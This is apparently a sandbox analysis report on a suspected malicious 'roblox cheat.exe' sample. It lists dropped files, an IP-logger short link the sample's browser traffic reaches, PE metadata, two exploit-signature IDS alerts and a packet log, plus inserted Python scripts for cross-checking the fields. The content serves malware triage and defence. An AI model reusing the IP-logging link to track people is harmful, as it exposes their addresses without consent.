                                                                                Preview:L..................F.@.. ...$+.,....c9.M......v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............ho.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                Category:dropped
                                                                                Size (bytes):445
                                                                                Entropy (8bit):7.051559084988302
                                                                                Encrypted:false
                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                Malicious:false
                                                                                Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):2833
                                                                                Entropy (8bit):7.876846206921263
                                                                                Encrypted:false
                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                Malicious:false
                                                                                URL:https://cdn.iplogger.org/favicon.ico
                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):2833
                                                                                Entropy (8bit):7.876846206921263
                                                                                Encrypted:false
                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                Malicious:false
                                                                                Preview:.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460), with CRLF, CR, LF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):9909
                                                                                Entropy (8bit):5.400635618832281
                                                                                Encrypted:false
                                                                                SSDEEP:192:DLlw+00cv13xV1cSHYu+zogD2IIhWp6psOsW4rqSxVEGF5R2WxSi1yz:D5w+Pcv13T1FH0f6IIm6QXxFP20u
                                                                                MD5:DA7F46B6C4BFB6F73BFBEE944F4A9B73
                                                                                SHA1:165FFC72B4F69AD1184C09F23C9F71A562D41C11
                                                                                SHA-256:A53D8855089EA2072D45179F32880E3DBAF6BD6385BAAFAFADBBCC4B26B937EA
                                                                                SHA-512:7D0E7EAB00851F7E53F66BABE554F88346BBACD2DE32020C6BF3C6849C0F7026C1C552199040F2B9C8EDB89775D29AC9766A4A066C004C063358EC23FE36D863
                                                                                Malicious:false
                                                                                URL:https://2no.co/24RXx6
                                                                                Preview:<!DOCTYPE html>.<html lang="US" class="html">.<head>..<title>Branded Short Domain</title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-2024" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="2no.co is a Branded Short Domain..." />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285"
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                Category:downloaded
                                                                                Size (bytes):445
                                                                                Entropy (8bit):7.051559084988302
                                                                                Encrypted:false
                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                Malicious:false
                                                                                URL:https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682
                                                                                Preview:GIF87a...........V...B...."...j.2&.bB..B...v.ZN>..*&...R6.*"..*:&..b....r.&"..r.J....rJ....z...$..6&.....2..R...^>..^..j.~R...N6.jF...&...n...V:.>*...N2..Z.F.....z.."..f..v...vN..~.....,.............g.(.YH.o...T.H.F..v..v...wL.j......pR..W.........}lh|..~\gtY....u.\6&.j.\?4.d.\...^.$.[.(....Z=<.Z...[=....[.Y.+....Z7.....\.%...\:....[.3...Z.5...$.1.....y. .y...u.8.q'.!".e'...P......".a.E..*2..1....."\.....8`...;
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):6.461330913623725
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.64%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • InstallShield setup (43055/19) 0.21%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                File name:roblox cheat.exe
                                                                                File size:6'410'752 bytes
                                                                                MD5:6b94734feac8edb9f925385163ad59c9
                                                                                SHA1:3ec9cc36f11ce7836e86089631ad790e7c8fe3cc
                                                                                SHA256:62d6f204244bbb976a155aa7750874a56db925c8531d76dce6bf5560440cb63c
                                                                                SHA512:ac51fd23bf17d0f6d4b4fac338d80dd50c4228e45472370b8806e0c1b00504f6c45978ccab134e3e0531d212e4c0d0222e1661c8c07c88bf1d1482047efa6ed5
                                                                                SSDEEP:98304:d7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuqbqw/:p0cB3djgmggDaRXAtHtqw/
                                                                                TLSH:A356CE12F940C071E5D240B296BEAF76897DAD300B3898D777C41D694A316E37A3AF27
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................`...........a.. ... a...@.. .......................@b...........`................................
                                                                                Icon Hash:66e2a0a0b0aa92b6
                                                                                Entrypoint:0xa11b1e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x66A81403 [Mon Jul 29 22:13:23 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the zero bytes that follow the 6-byte entry stub decode as this instruction)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x611acc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x614000 | 0xcc88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x622000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x612000 | 0x1c | .sdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x60fb24 | 0x60fc00 | 935fc6ce3cd3ebf8fbc30adc805334f8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0x612000 | 0x138 | 0x200 | 2b09539ff4c51eb230bd835080b63517 | False | 0.279296875 | data | 2.11838246956095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x614000 | 0xcc88 | 0xce00 | 0be98fb8efcbbfdb03fefe23184dff85 | False | 0.17957372572815533 | data | 4.313831842937731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x622000 | 0xc | 0x200 | 3c75d8bdac0c06768297755f0689be06 | False | 0.044921875 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "a" | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6144c8 | 0xeeb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8866195339094004
RT_ICON | 0x6153b8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | | | 0.061230514879546526
RT_ICON | 0x6195e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.09139004149377593
RT_ICON | 0x61bb88 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 0 | | | 0.11553254437869823
RT_ICON | 0x61d5f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.1376641651031895
RT_ICON | 0x61e698 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.1918032786885246
RT_ICON | 0x61f020 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 0 | | | 0.2779069767441861
RT_ICON | 0x61f6d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.30939716312056736
RT_GROUP_ICON | 0x61fb40 | 0x76 | data | | | 0.7457627118644068
RT_VERSION | 0x614280 | 0x244 | data | | | 0.46551724137931033
RT_MANIFEST | 0x61fbb8 | 0x10d0 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text | | | 0.40892193308550184
DLL | Import
mscoree.dll | _CorExeMain
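The static fields above (entry point, time stamp, data directories, sections, imports) can be cross-checked with a few lines of code. The script below is an added example and is not Joe Sandbox's code or the sample's: it re-derives the entry-point-in-section check, decodes the TimeDateStamp, and tests for the standard 32-bit .NET loader stub (a single `jmp` through the one IAT slot to mscoree!_CorExeMain with a CLR header present). It also carries the Shannon entropy function behind the report's Entropy columns, exercised on constructed byte strings. Every numeric constant is copied from the tables above; the check logic and the demonstration inputs are the author's assumptions.

```python
"""Added example: sanity checks on the static PE fields of this report.

Stand-alone example code, not part of Joe Sandbox or of the sample. All
constants are copied from the report's header, data-directory, section and
import tables; the check logic and the constructed byte strings used for the
entropy demonstration are the author's assumptions.
"""
import datetime
import math
from collections import Counter

# Joe Sandbox prints the entry point as a virtual address (image base added).
IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0xA11B1E
# Bytes of the instruction at the entry point: jmp dword ptr [00402000h]
ENTRY_STUB = b"\xff\x25" + (0x402000).to_bytes(4, "little")
TIME_STAMP = 0x66A81403

SECTIONS = {  # name: (virtual address, virtual size)
    ".text": (0x2000, 0x60FB24),
    ".sdata": (0x612000, 0x138),
    ".rsrc": (0x614000, 0xCC88),
    ".reloc": (0x622000, 0xC),
}
DIRECTORIES = {  # name: (RVA, size)
    "IAT": (0x2000, 0x8),
    "COM_DESCRIPTOR": (0x2008, 0x48),
    "IMPORT": (0x611ACC, 0x4F),
}
IMPORTS = {"mscoree.dll": ["_CorExeMain"]}


def section_of(rva):
    """Return the name of the section containing an RVA, or None."""
    for name, (va, size) in SECTIONS.items():
        if va <= rva < va + size:
            return name
    return None


def decode_timestamp(ts):
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch, in UTC."""
    when = datetime.datetime.fromtimestamp(ts, datetime.timezone.utc)
    return when.strftime("%Y-%m-%d %H:%M:%S UTC")


def jmp_indirect_target(stub):
    """Decode FF 25 <disp32>: absolute indirect jmp through a 32-bit pointer."""
    if len(stub) != 6 or stub[:2] != b"\xff\x25":
        raise ValueError("not an FF 25 indirect jmp")
    return int.from_bytes(stub[2:], "little")


def is_clr_entry_stub():
    """True if the entry point is the classic 32-bit .NET loader stub: a jmp
    in .text through the IAT, which holds exactly one slot plus terminator,
    the only import being mscoree!_CorExeMain, and a CLR header present."""
    ep_rva = ENTRYPOINT_VA - IMAGE_BASE
    pointer_rva = jmp_indirect_target(ENTRY_STUB) - IMAGE_BASE
    iat_rva, iat_size = DIRECTORIES["IAT"]
    return (
        section_of(ep_rva) == ".text"
        and iat_rva <= pointer_rva < iat_rva + iat_size
        and iat_size == 8  # one 4-byte slot plus the null terminator
        and DIRECTORIES["COM_DESCRIPTOR"][1] == 0x48  # sizeof(IMAGE_COR20_HEADER)
        and IMPORTS == {"mscoree.dll": ["_CorExeMain"]}
    )


def shannon_entropy(data):
    """Bits per byte, 0.0 to 8.0: the metric behind the report's Entropy columns."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    ep_rva = ENTRYPOINT_VA - IMAGE_BASE
    print("entry point RVA:", hex(ep_rva), "in section", section_of(ep_rva))
    print("compile time:", decode_timestamp(TIME_STAMP))
    print("standard CLR entry stub:", is_clr_entry_stub())
    # Constructed demonstration inputs, not bytes from the sample.
    print("entropy of 64 zero bytes:", shannon_entropy(bytes(64)))
    print("entropy of 0x00..0xFF once each:", shannon_entropy(bytes(range(256))))
```

Two things the numbers show when the script is run against the report's values: the 6-byte stub at RVA 0x611b1e ends exactly at the end of .text (0x2000 + 0x60fb24 = 0x611b24), which is the usual layout the C# compiler emits, and the time stamp decodes to 2024-07-29 22:13:23 UTC, about 40 minutes before the first packet in the network table below (00:54:18 CEST on Jul 30, i.e. 22:54:18 UTC).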
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-30T00:54:42.469428+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49712 | 20.114.59.183 | 192.168.2.9
2024-07-30T00:55:19.729239+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 60764 | 20.12.23.50 | 192.168.2.9
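Both alerts fired on bytes sent by the remote side of a port-443 session, so the first triage question is which packets the rule actually matched. The script below is an added example, not part of the report or of Joe Sandbox: it parses a subset of rows copied from the TCP table that follows, summarises the flows per remote endpoint, and pulls out the packets of the alert's flow that fall within a few milliseconds of the alert time. The 5 ms window, the assumption that the report's CEST label means UTC+2, and the summary layout are the author's.

```python
"""Added example: correlate one of the report's Suricata alerts with the
packet timeline and summarise the flows. Stand-alone code, not part of Joe
Sandbox or of the sample. The alert and the packet rows are copied from the
report's IDS and TCP tables (a subset of rows); the 5 ms matching window,
the CEST = UTC+2 assumption and the summary layout are the author's."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

SANDBOX_HOST = "192.168.2.9"
CEST = timezone(timedelta(hours=2))  # assumption: the report's CEST label means UTC+2

# Subset of the report's TCP rows: timestamp, src port, dst port, src IP, dst IP
PACKETS_RAW = """\
Jul 30, 2024 00:54:41.145207882 CEST 49712 443 192.168.2.9 20.114.59.183
Jul 30, 2024 00:54:41.145262003 CEST 443 49712 20.114.59.183 192.168.2.9
Jul 30, 2024 00:54:42.038912058 CEST 49713 443 192.168.2.9 104.21.79.229
Jul 30, 2024 00:54:42.466484070 CEST 443 49712 20.114.59.183 192.168.2.9
Jul 30, 2024 00:54:42.469263077 CEST 443 49712 20.114.59.183 192.168.2.9
Jul 30, 2024 00:54:42.469310045 CEST 49712 443 192.168.2.9 20.114.59.183
Jul 30, 2024 00:54:43.619059086 CEST 443 49713 104.21.79.229 192.168.2.9
"""

ALERT = {  # the first of the report's two IDS alerts
    "timestamp": "2024-07-30T00:54:42.469428+0200",
    "sid": 2022930,
    "signature": "ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow",
    "src": ("20.114.59.183", 443),
    "dst": ("192.168.2.9", 49712),
}


def parse_packet(line):
    """Parse one TCP row. The report prints nanoseconds; strptime's %f takes
    at most six digits, so the fraction is truncated to microseconds."""
    parts = line.split()
    stamp, frac = " ".join(parts[:4]).rsplit(".", 1)
    ts = datetime.strptime(f"{stamp}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return {
        "ts": ts.replace(tzinfo=CEST),
        "sport": int(parts[5]),
        "dport": int(parts[6]),
        "src": parts[7],
        "dst": parts[8],
    }


def load_packets(raw=PACKETS_RAW):
    return [parse_packet(line) for line in raw.splitlines() if line.strip()]


def conversations(packets):
    """Per remote endpoint: packets sent by the sandbox host (out), packets
    received from the endpoint (in), and the first and last packet time."""
    summary = defaultdict(lambda: {"out": 0, "in": 0, "first": None, "last": None})
    for p in packets:
        if p["src"] == SANDBOX_HOST:
            key, direction = (p["dst"], p["dport"]), "out"
        else:
            key, direction = (p["src"], p["sport"]), "in"
        entry = summary[key]
        entry[direction] += 1
        entry["first"] = p["ts"] if entry["first"] is None else min(entry["first"], p["ts"])
        entry["last"] = p["ts"] if entry["last"] is None else max(entry["last"], p["ts"])
    return dict(summary)


def packets_for_alert(alert, packets, window=timedelta(milliseconds=5)):
    """Packets of the alert's flow (either direction) whose timestamp lies
    within +/- window of the alert time, i.e. the segments the rule saw."""
    alert_time = datetime.strptime(alert["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
    endpoints = {alert["src"], alert["dst"]}
    return [
        p for p in packets
        if {(p["src"], p["sport"]), (p["dst"], p["dport"])} == endpoints
        and abs(p["ts"] - alert_time) <= window
    ]


PACKETS = load_packets()

if __name__ == "__main__":
    for (ip, port), s in sorted(conversations(PACKETS).items()):
        print(f"{ip}:{port}  out={s['out']} in={s['in']}  {s['first'].time()} .. {s['last'].time()}")
    hits = packets_for_alert(ALERT, PACKETS)
    print(f"SID {ALERT['sid']} at {ALERT['timestamp']}: {len(hits)} packet(s) in the flow within 5 ms")
    for p in hits:
        arrow = "<-" if p["src"] != SANDBOX_HOST else "->"
        print(f"  {p['ts'].time()} {arrow} {p['src']}:{p['sport']} -> {p['dst']}:{p['dport']}")
```

On the rows above the alert lines up with the server-to-client segments at 00:54:42.466 and 00:54:42.469 on the 49712/443 flow, and only an outbound ACK from the sandbox host sits inside the same window. That is the evidence to carry forward when deciding whether a content-match hit on a port-443 session deserves decryption and deeper review or is a byte-pattern coincidence.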
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 30, 2024 00:54:18.425143957 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Jul 30, 2024 00:54:18.737216949 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Jul 30, 2024 00:54:19.346632004 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Jul 30, 2024 00:54:19.362289906 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203
Jul 30, 2024 00:54:20.549835920 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209
Jul 30, 2024 00:54:20.553518057 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209
Jul 30, 2024 00:54:20.553522110 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Jul 30, 2024 00:54:20.799818993 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209
Jul 30, 2024 00:54:22.956022024 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Jul 30, 2024 00:54:26.258094072 CEST | 49708 | 443 | 192.168.2.9 | 128.116.21.3
Jul 30, 2024 00:54:26.258135080 CEST | 443 | 49708 | 128.116.21.3 | 192.168.2.9
Jul 30, 2024 00:54:26.258205891 CEST | 49708 | 443 | 192.168.2.9 | 128.116.21.3
Jul 30, 2024 00:54:26.259303093 CEST | 49708 | 443 | 192.168.2.9 | 128.116.21.3
Jul 30, 2024 00:54:26.259316921 CEST | 443 | 49708 | 128.116.21.3 | 192.168.2.9
Jul 30, 2024 00:54:26.991041899 CEST | 443 | 49708 | 128.116.21.3 | 192.168.2.9
Jul 30, 2024 00:54:27.020034075 CEST | 49708 | 443 | 192.168.2.9 | 128.116.21.3
Jul 30, 2024 00:54:27.020046949 CEST | 443 | 49708 | 128.116.21.3 | 192.168.2.9
Jul 30, 2024 00:54:27.021752119 CEST | 443 | 49708 | 128.116.21.3 | 192.168.2.9
Jul 30, 2024 00:54:27.021819115 CEST | 49708 | 443 | 192.168.2.9 | 128.116.21.3
Jul 30, 2024 00:54:27.038989067 CEST | 49708 | 443 | 192.168.2.9 | 128.116.21.3
Jul 30, 2024 00:54:27.039130926 CEST | 49708 | 443 | 192.168.2.9 | 128.116.21.3
Jul 30, 2024 00:54:27.645862103 CEST | 49711 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:54:27.645909071 CEST | 443 | 49711 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:54:27.646040916 CEST | 49711 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:54:27.647360086 CEST | 49711 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:54:27.647380114 CEST | 443 | 49711 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:54:27.768436909 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11
Jul 30, 2024 00:54:28.375315905 CEST | 443 | 49711 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:54:28.375865936 CEST | 49711 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:54:28.375876904 CEST | 443 | 49711 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:54:28.377136946 CEST | 443 | 49711 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:54:28.377219915 CEST | 49711 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:54:28.378432035 CEST | 49711 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:54:28.378607988 CEST | 443 | 49711 | 18.239.18.85 | 192.168.2.9
Jul 30, 2024 00:54:28.378665924 CEST | 49711 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:54:28.386760950 CEST | 49711 | 443 | 192.168.2.9 | 18.239.18.85
Jul 30, 2024 00:54:28.964431047 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203
Jul 30, 2024 00:54:30.161459923 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209
Jul 30, 2024 00:54:30.161780119 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209
Jul 30, 2024 00:54:30.401547909 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209
Jul 30, 2024 00:54:32.190599918 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9
Jul 30, 2024 00:54:32.190746069 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209
